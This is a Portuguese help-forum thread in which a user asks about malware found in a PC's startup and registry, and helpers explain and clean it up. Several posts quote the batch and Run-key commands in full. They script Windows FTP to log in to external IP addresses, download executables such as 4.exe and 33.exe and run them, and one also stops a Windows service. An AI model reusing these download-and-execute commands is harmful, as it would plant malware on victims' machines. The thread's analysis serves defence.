Olá, amigos
Encontrei o codigo abaixo no inicializar de um micro, me parece que faz a transferência do executável 4.exe via ftp.
Gostaria de entender o que este código realmente faz,
Fico grato por qualquer ajuda.
@echo off
@echo off>x
mode con: COLS=15 lines=10>x
@echo open 199.36.75.225>x
@echo 123>>x
@echo 123>>x
echo get c:\4.exe>>x
@echo bye>>X
@ftp -s:x
start C:\4.exe>>x
- Home
- >
- Fórum
- >
- Windows, Softwa...
- >
- Análise de log,...
- >
- Script malicioso
gvl disse: Olá, amigos
Encontrei o codigo abaixo no inicializar de um micro, me parece que faz a transferência do executável 4.exe via ftp.
Gostaria de entender o que este código realmente faz,
Fico grato por qualquer ajuda.
@echo off
Desativa a exibição dos comandos na janela do Prompt
@echo off>x
Redireciona o resultado do mesmo comando acima para o arquivo de nome "x" (para não exibir nada na tela)
mode con: COLS=15 lines=10>x
Diminui o tamanho da janela para ficar menos visível (e redireciona a saída do comando para o arquivo "x")
[LIST=1]
eepSkyBlue">@echo open 199.36.75.225>x
eepSkyBlue"> @echo 123>>x
eepSkyBlue"> @echo 123>>x
eepSkyBlue"> echo get c:\4.exe>>x
eepSkyBlue"> @echo bye>>X[/LIST]
Esses comandos em azul são escritos para o arquivo de nome "X" para realizar:
[LIST=1]
abrir conexão com o servidor FTP 199.36.75.225
mandar o nome de usuário "123" para fazer login
mandar a senha "123" para fazer login
pega o arquivo "4.exe" do servidor e faz a transferência para "C:\"
desconecta do servidor[/LIST]@ftp -s:x
Abre o cliente FTP do Windows e carrega os comandos a serem realizados (que estão no arquivo "x", que foram escritos no mesmo)
start C:\4.exe>>x
Inicia o executável transferido do servidor FTP (e redireciona a saida para o arquivo "x")
Apenas para constar, não consegui conexão FTP com esse IP...
Salve, Salve amigo Meyer!
Muito obrigado pela resposta.
Abs, gvl
Salve amigo Meyer! ,
Apenas para constar, no consegui conexo FTP com esse IP...
Olhando o hijackthis encontrei esta entrada no registro do Windows., aquele outro Ip realmente não esta mesmo funcionando.
O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 222.186.30.65 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 4.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&4.exe&4.exe&del cmd.txt /q /f&ex
gvl disse: Salve amigo Meyer! ,
Olhando o hijackthis encontrei esta entrada no registro do Windows., aquele outro Ip realmente não esta mesmo funcionando.
É praticamente a mesma coisa que eu disse acima, mas tudo resumido só em um comando (para abrir com o CMD, e os caracteres especiais de funções fazem a mágica), mas tem uma coisa extra nesse script, ele desativa o acesso compartilhado (para compartilhar a internet). Esse IP também não vai.
Tem momentos que fica off, neste momento esta on-line e olhando tem 6 executáveis neste FTP, cujo conteudo parecer ser modificado com frequencia.
Neste caso o Firewall do Windows e o Kaspersky do micro eram para barrar a transferência destes executáveis, correto ?
Temporariamente desativei o CMD do sevem, com isto estes comandos via prompt serão impedidos de serem executados ?
Um deles de algum modo cria uma conta de usuário no micro chamada ' 123 ', como impedir o Sevem de criar contas de usuários além daquelas que já existem no micro ?
É que neste micro preciso de 3 contas e por azar as 3 precisam ter permissão de adminstrador.
Veja.
Edit: no micro tem o Windows PowerShell, pelo visto apenas o bloqueio do cmd talvez não seje suficiente.
Kaspersky
Anti-Virus 2013
ACESSO NEGADO
No foi possvel recuperar o URL solicitado
URL:
http://www.ganchungeng.cn/123/1.exe
Bloqueado pelo Antivrus da Web
Motivo: "URL perigoso"
Clique aqui se voc achar que a pgina da Web foi bloqueada incorretamente.
Mtodo de deteco: proteo em nuvem
Mensagem gerada em: 02:31:51
Escreva netstat -an para descobrir a porta por onde esse malware faz a transferência para o server FTP.
Abraços.
Salve, Salve amigo
Obrigado João Por mover o tópico.
Henry-Keys, segue saida do comando.
Na lista abaixo tem como identificar qual porta foi usada ?
Proto Endere?o local Endere?o externo Estado
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:554 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1110 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2383 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2869 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3128 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5800 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5900 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8221 0.0.0.0:0 LISTENING
TCP 0.0.0.0:10243 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49158 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49159 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1110 127.0.0.1:56960 ESTABLISHED
TCP 127.0.0.1:1110 127.0.0.1:56962 ESTABLISHED
TCP 127.0.0.1:1110 127.0.0.1:56964 ESTABLISHED
TCP 127.0.0.1:1110 127.0.0.1:57465 TIME_WAIT
TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING
TCP 127.0.0.1:14147 0.0.0.0:0 LISTENING
TCP 127.0.0.1:49156 127.0.0.1:49157 ESTABLISHED
TCP 127.0.0.1:49157 127.0.0.1:49156 ESTABLISHED
TCP 127.0.0.1:56960 127.0.0.1:1110 ESTABLISHED
TCP 127.0.0.1:56962 127.0.0.1:1110 ESTABLISHED
TCP 127.0.0.1:56964 127.0.0.1:1110 ESTABLISHED
TCP 192.168.0.252:139 0.0.0.0:0 LISTENING
TCP 192.168.0.252:445 192.168.0.22:1116 ESTABLISHED
TCP 192.168.0.252:445 192.168.0.25:61278 ESTABLISHED
TCP 192.168.0.252:1433 192.168.0.12:50433 ESTABLISHED
TCP 192.168.0.252:1433 192.168.0.12:61806 ESTABLISHED
TCP 192.168.0.252:1433 192.168.0.22:1118 ESTABLISHED
TCP 192.168.0.252:1433 192.168.0.25:52485 ESTABLISHED
TCP 192.168.0.252:1433 192.168.0.25:61291 ESTABLISHED
TCP 192.168.0.252:3128 192.168.0.3:4738 ESTABLISHED
TCP 192.168.0.252:3128 192.168.0.8:1786 ESTABLISHED
TCP 192.168.0.252:3128 192.168.0.14:1924 ESTABLISHED
TCP 192.168.0.252:3128 192.168.0.14:1998 TIME_WAIT
TCP 192.168.0.252:3389 192.168.0.254:22459 ESTABLISHED
TCP 192.168.0.252:56961 78.141.179.18:443 ESTABLISHED
TCP 192.168.0.252:56963 108.160.163.37:80 ESTABLISHED
TCP 192.168.0.252:56965 108.160.163.52:80 ESTABLISHED
TCP 192.168.0.252:57132 192.168.0.5:445 ESTABLISHED
TCP 192.168.0.252:57467 4.28.136.36:80 TIME_WAIT
TCP [::]:80 [::]:0 LISTENING
TCP [::]:135 [::]:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
TCP [::]:554 [::]:0 LISTENING
TCP [::]:1110 [::]:0 LISTENING
TCP [::]:1433 [::]:0 LISTENING
TCP [::]:2383 [::]:0 LISTENING
TCP [::]:2869 [::]:0 LISTENING
TCP [::]:3389 [::]:0 LISTENING
TCP [::]:3587 [::]:0 LISTENING
TCP [::]:5357 [::]:0 LISTENING
TCP [::]:8221 [::]:0 LISTENING
TCP [::]:10243 [::]:0 LISTENING
TCP [::]:49152 [::]:0 LISTENING
TCP [::]:49153 [::]:0 LISTENING
TCP [::]:49154 [::]:0 LISTENING
TCP [::]:49155 [::]:0 LISTENING
TCP [::]:49158 [::]:0 LISTENING
TCP [::]:49159 [::]:0 LISTENING
TCP [::1]:1434 [::]:0 LISTENING
TCP [::1]:14147 [::]:0 LISTENING
TCP [fe80::3c47:7c51:4059:5ef0%13]:445 [fe80::d8c3:e6c2:db47:8b5b%13]:61791 ESTABLISHED
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:3130 *:*
UDP 0.0.0.0:3401 *:*
UDP 0.0.0.0:3544 *:*
UDP 0.0.0.0:3702 *:*
UDP 0.0.0.0:3702 *:*
UDP 0.0.0.0:3702 *:*
UDP 0.0.0.0:3702 *:*
UDP 0.0.0.0:4500 *:*
UDP 0.0.0.0:4827 *:*
UDP 0.0.0.0:5004 *:*
UDP 0.0.0.0:5005 *:*
UDP 0.0.0.0:5355 *:*
UDP 0.0.0.0:52720 *:*
UDP 0.0.0.0:52722 *:*
UDP 0.0.0.0:52724 *:*
UDP 0.0.0.0:58683 *:*
UDP 127.0.0.1:1900 *:*
UDP 127.0.0.1:64944 *:*
UDP 192.168.0.252:137 *:*
UDP 192.168.0.252:138 *:*
UDP 192.168.0.252:1900 *:*
UDP 192.168.0.252:61989 *:*
UDP 192.168.0.252:64943 *:*
UDP [::]:500 *:*
UDP [::]:3540 *:*
UDP [::]:3702 *:*
UDP [::]:3702 *:*
UDP [::]:3702 *:*
UDP [::]:3702 *:*
UDP [::]:4500 *:*
UDP [::]:5004 *:*
UDP [::]:5005 *:*
UDP [::]:5355 *:*
UDP [::]:52721 *:*
UDP [::]:52723 *:*
UDP [::]:52725 *:*
UDP [::1]:1900 *:*
UDP [::1]:64942 *:*
UDP [fe80::3c47:7c51:4059:5ef0%13]:546 *:*
UDP [fe80::3c47:7c51:4059:5ef0%13]:1900 *:*
UDP [fe80::3c47:7c51:4059:5ef0%13]:64941 *:*
gvl disse: Olá,
Como o tópico é de 2012 pedi permissão para levanta-lo e dependendo do rumo que tomar peço para algum moderador move-lo para outra sala se for o caso.
Depois de alguns meses de trégua, hoje achei mais alguns EXE estranhos no micro.
O CMD ( prompt de comando ) esta bloqueado no miro, mas mesmo assim o comando abaixo é executado.
A porta FTP esta bloqueada e mesmo assim ocorre a transferência do .exe.
Achei um arquivo chamando dump.exe cujo contéudo segue abaixo:
Este aqui é o conteúdo do 1.exe mencionado acima,
Tem um chamado 888.exe que não deu para abrir pelo bloco de notas.
Como posso bloquear a execução automática destes scritps ?
O teu antivírus bloqueou o 1.exe
E bloquear não me lembro, talvez tenham ferramentas específicas para tal
O teu antivírus bloqueou o 1.exe
Dando uma olha no registro do Windows achei algumas entradas estranhas, acabei chegando no log abaixo.
Agora me pergunto como o Kaspersky deixou passar e como bloquear este tipo de instalação silênciosa ?
Fiz a desinstalação, rodei o malwarebytes, o kaspersky, um limpador de registro em, seguida deletei as entradas no registro do windows.
2013-6-1 04:11:03 754 StartSlientIntall
2013-6-1 04:11:03 754 ExtraceFile begin...C:\Windows\system32\config\systemprofile\AppData\Local\liebao\
2013-6-1 04:11:03 754 GetPacketData 0
2013-6-1 04:11:03 879 GetPacketData return:20516394
2013-6-1 04:11:03 879 Extract...
2013-6-1 04:11:11 882 Extract return:1
2013-6-1 04:11:11 882 SetStartCheckDefaultBrowser start
2013-6-1 04:11:11 882 strAccountDir = C:\Windows\system32\config\systemprofile\AppData\Local\liebao\User Data\Default\Preferences
2013-6-1 04:11:11 882 WriteReg start
2013-6-1 04:11:11 882 WriteReg end
2013-6-1 04:11:11 882 Shortcut start
2013-6-1 04:11:11 882 IsCreateLink Start
2013-6-1 04:11:11 882 IsCreateLink strPid:6
2013-6-1 04:11:11 882 IsCreateLink bExist1:0 ,bExist2:0
2013-6-1 04:11:11 882 IsCreateLink strDesktopPath:C:\Users\Public\Desktop\
2013-6-1 04:11:11 882 IsCreateLink strDesktopPath:C:\Users\Public\Desktop\
2013-6-1 04:11:11 882 IsCreateLink End
2013-6-1 04:11:11 882 CreateShellLink start...
2013-6-1 04:11:11 929 CreateShellLink return:1, file:C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\liebao.exe, cmd:, link:C:\Windows\system32\config\systemprofile\Desktop\
2013-6-1 04:11:12 194 CreateShellLink start...
2013-6-1 04:11:12 194 CreateShellLink return:1, file:C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\liebao.exe, cmd:, link:C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
2013-6-1 04:11:12 194 CreateShellLink start...
2013-6-1 04:11:12 209 CreateShellLink return:1, file:C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\uninst.exe, cmd:, link:C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
2013-6-1 04:11:12 209 Shortcut end
2013-6-1 04:11:12 209 StartSvr start
2013-6-1 04:11:12 443 StartSvr end
2013-6-1 04:11:12 443 install_Tencentdl start
2013-6-1 04:11:12 475 install_Tencentdl end
2013-6-1 04:11:12 475 RealInstallFunc Success
2013-6-1 04:11:12 475 Report start
2013-6-1 04:11:13 473 Report end
2013-6-1 04:11:13 473 path = C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\liebao.exe,curpever = 3.0.14.3728,installver = 3.0.14.3728
2013-6-1 04:11:14 378 path = C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\chrome.dll,curpever = 3.0.14.3728,installver = 3.0.14.3728
2013-6-1 04:11:14 378 OldDefaultBrowser="C:\Program Files\Internet Explorer\iexplore.exe" -nohome
2013-6-1 04:14:23 310 StartSlientIntall
2013-6-1 04:14:23 310 OldDefaultBrowser="C:\Windows\system32\config\systemprofile\AppData\Local\liebao\LBBrowser\liebao.exe" "%1"
2013-6-1 04:14:23 310 KFunction::RunApp CreateProcessW error:2, wait:-1, show:0, path:LBBrowser\liebao.exe, cmd:--make-default-browser
Aqui outro log chamado LocalState
{
"uninstall_metrics": {
"installation_date2": "1370070674",
"launch_count": "1"
},
"user_experience_metrics": {
"low_entropy_source": 7835,
"session_id": 0,
"stability": {
"breakpad_registration_fail": 0,
"breakpad_registration_ok": 0,
"crash_count": 0,
"debugger_not_present": 0,
"debugger_present": 0,
"exited_cleanly": true,
"incomplete_session_end_count": 0,
"last_timestamp_sec": "1370070674",
"launch_count": 1,
"launch_time_sec": "1370070674",
"page_load_count": 0,
"renderer_crash_count": 0,
"renderer_hang_count": 0,
"session_end_completed": true,
"stats_buildtime": "1357739645",
"stats_version": "3.0.14.3728-devel"
}
}
}
Fiz a desativação do prompt de comando pelo gpedit.msc, fiz o bloqueio do powershell e mesmo assim veja o que achei no registro do windows.
Procurei pelo exe mencionado na entrada mas não achei, mas de qualquer forma fica a preocupação.
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 220.180.147.33 > cmd.txt&echo 110>> cmd.txt&echo 110>> cmd.txt&echo binary >> cmd.txt&echo get 33.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&33.exe&33.exe&del cmd.txt /q /f
Os arquivos sugerem ser um worm.
O problema mais difícil é:
É que neste micro preciso de 3 contas e por azar as 3 precisam ter permissão de adminstrador.
*Execute-o e aceite o contrato
*Clique [Start]
*Ao término, cole o relatório Nmc_data_horário.txt localizado no Desktop
Olá, Wings
Obrigado pela ajuda, segue resultado.
Norman Malware Cleaner v2.08.05
Copyright © 1990 - 2013, Norman Shark AS.
Norman Scanner Engine Version: 7.01.04
nvcbin.def: Version: 7.01.4644, Date: 2013/06/10 10:39:11, Variants: 20991153
Operating System: Windows 7
Switches: /iagree
Running without NSAK
Scan started: 2013/06/10 21:33:21
Running pre-scan cleanup routine...
Number of malicious objects found: 0
Number of malicious objects cleaned: 0
Scanning time: 1s
Scanning system for active rootkit activity...
Number of malicious objects found: 0
Number of malicious objects cleaned: 0
Number of malicious files found: 0
Number of malicious files cleaned: 0
Scanning time: 0s
Scanning running processes and process memory...
Number of files found: 760
Number of objects found: 8610
Number of objects scanned: 8610
Number of objects not scanned: 0
Number of malicious memory objects found: 0
Number of malicious objects cleaned: 0
Number of malicious files found: 0
Number of malicious files cleaned: 0
Scanning time: 2m 51s
Scanning system for FakeAV...
Number of malicious objects found: 0
Number of malicious objects cleaned: 0
Number of malicious files found: 0
Number of malicious files cleaned: 0
Scanning time: 0s
Running quick scan...
Number of files found: 0
Number of archives unpacked: 0
Number of objects found: 0
Number of objects scanned: 0
Number of objects not scanned: 0
Number of malicious objects found: 0
Number of malicious objects cleaned: 0
Number of malicious files found: 0
Number of malicious files cleaned: 0
Scanning time: 19s
Running post-scan cleanup routine...
Number of malicious objects found: 0
Number of malicious objects cleaned: 0
Scanning time: 0s
Results:
Total number of files found: 760
Total number of archives unpacked: 0
Total number of objects found: 8610
Total number of objects scanned: 8610
Total number of objects not scanned: 0
Total number of malicious objects found: 0
Total scanning time: 3m 11s
*Execute-o. Usuários do Windows Vista ou do Windows 7 devem clicar com o botão direito do mouse no arquivo e selecionar Executar como administrador
*Cole as linhas em marron no espaço
startupall;
autoclean;
filesrcm;
emptyalltemp;
*Clique [Run Script]
*Aguarde o término....Pode demorar um pouco!
*Caso a reinicialização do PC seja solicitada, clique [OK] para reiniciar
*Clique [Selecionar arquivo...]
*Localize o relatório C:\zoek-results.log e clique [Abrir]
*Selecione 4 jours
*Clique [Créer le lien Cjoint]
*Cole o link criado ao lado de Le lien a été créé: